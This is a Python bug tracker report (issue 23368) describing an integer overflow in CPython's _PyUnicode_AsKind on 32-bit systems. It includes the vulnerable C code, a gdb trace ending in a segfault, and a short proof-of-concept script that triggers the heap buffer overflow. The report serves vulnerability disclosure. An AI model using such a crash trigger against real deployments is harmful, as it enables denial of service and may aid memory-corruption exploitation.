[issue23368] integer overflow in _PyUnicode_AsKind

Sun Feb 1 14:58:39 CET 2015

New submission from paul:

# Bug
# ---
# 
# void*
# _PyUnicode_AsKind(PyObject *s, unsigned int kind)
# {
#     Py_ssize_t len;
#     ...
#     len = PyUnicode_GET_LENGTH(s);
#     ...
#     switch (kind) {
#     ...
#     case PyUnicode_4BYTE_KIND:
# 1       result = PyMem_Malloc(len * sizeof(Py_UCS4));
#         ...
#         else {
#             assert(skind == PyUnicode_1BYTE_KIND);
# 2           _PyUnicode_CONVERT_BYTES(
#                 Py_UCS1, Py_UCS4,
#                 PyUnicode_1BYTE_DATA(s),
#                 PyUnicode_1BYTE_DATA(s) + len,
#                 result);
#         }
# 
# 1. len equals 2^30, so len*sizeof(Py_UCS4)=2^30*2^2=2^32, which gets casted 
#    down to 0, since PyMem_Malloc takes size_t as the parameter. Resulting buffer
#    is 0 bytes big.
# 2. chars from the source string s (which are 1 byte long) are expanded to 4 
#    bytes and copied to the 'result' buffer, which is too small to hold them all
# 
# Stack trace
# -----------
# 
# Breakpoint 2, _PyUnicode_AsKind (
#     s='a...', kind=4) at Objects/unicodeobject.c:2176
# 2176        if (PyUnicode_READY(s) == -1)
# (gdb) n
# 2179        len = PyUnicode_GET_LENGTH(s);
# (gdb) n
# 2180        skind = PyUnicode_KIND(s);
# (gdb) n
# 2181        if (skind >= kind) {
# (gdb) n
# 2185        switch (kind) {
# (gdb) n
# 2198            result = PyMem_Malloc(len * sizeof(Py_UCS4));
# (gdb) print len
# $10 = 1073741824
# (gdb) print skind
# $11 = 1
# (gdb) print kind
# $12 = 4
# (gdb) print len*4
# $13 = 0
# (gdb) c
# Continuing.
#  
# Program received signal SIGSEGV, Segmentation fault.
# 0x08130b56 in _PyUnicode_AsKind (
#     s='a...', kind=4) at Objects/unicodeobject.c:2210
# 2210                _PyUnicode_CONVERT_BYTES(
# 
# OS info
# -------
# 
# % ./python -V
# Python 3.4.1
#  
# % uname -a
# Linux ubuntu 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed Aug 14 15:31:16 UTC 2013 i686 i686 i386 GNU/Linux
#  
# POC
# ---

txt=b"\x0a\x0a\x0a\x00"
uni=txt.decode("utf-32")
sub="a"*(2**30)
uni.count(sub)

----------
files: poc_askind.py
messages: 235176
nosy: pkt
priority: normal
severity: normal
status: open
title: integer overflow in _PyUnicode_AsKind
type: crash
versions: Python 3.4
Added file: http://bugs.python.org/file37967/poc_askind.py

_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue23368>
_______________________________________